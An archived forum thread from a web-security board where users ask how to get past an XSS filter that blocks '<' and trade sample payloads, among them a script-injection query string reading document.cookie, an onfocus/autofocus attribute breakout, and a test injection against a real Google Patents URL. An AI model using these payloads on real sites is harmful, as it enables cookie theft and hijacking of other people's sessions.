bypass xss filter: "<" not allowed

sla.ckers.org is
ha.ckers sla.cking

Q and A for any cross site scripting information. Feel free to ask away.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

bypass xss filter: "<" not allowed

Posted by: nulbyte

Date: July 30, 2010 07:52AM

Hello everyone, i am trying to bypass a xss filter, but "<" is not allowed.
Charset= utf-8

Can someone help me?

Options: Reply•Quote

Re: bypass xss filter: "<" not allowed

Posted by: Skyphire

Date: August 03, 2010 02:04PM

That's little info you got.

Options: Reply•Quote

Re: bypass xss filter: "<" not allowed

Posted by: Mihaeils

Date: September 24, 2011 10:50AM

The same problem.

Example:

a.php?a="><script>alert(document.cookie)</script>

<input type="hidden" name="a" value="">alert(document.cookie)" />

a.php?a=">script>alert(document.cookie)/script>

<input type="hidden" name="a" value="">script>alert(document.cookie)/script>" />

Options: Reply•Quote

Re: bypass xss filter: "<" not allowed

Posted by: Albino

Date: October 07, 2011 07:36AM

a.php?a=" onfocus="prompt(1)" autofocus b="

Options: Reply•Quote

Re: bypass xss filter: "<" not allowed

Posted by: marco

Date: October 24, 2011 07:29AM

hello,someone can tell me what's wrong here ?

http://www.google.com/patents?q=lol&lr=&sa=N&start="><script>alert(0)</script>

I have disabled the xss filter but my browser still show the message "internet explorer has modified this page to prevent cross site scripting"

tested on IE8

see: http://i.imgur.com/GNvX9.jpg

thank you

Options: Reply•Quote

Re: bypass xss filter: "<" not allowed

Posted by: BreakThesec

Date: January 21, 2012 11:51PM

use Mozilla instead of IE

www.breakthesecurity.com
www.ehackingnews.com

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login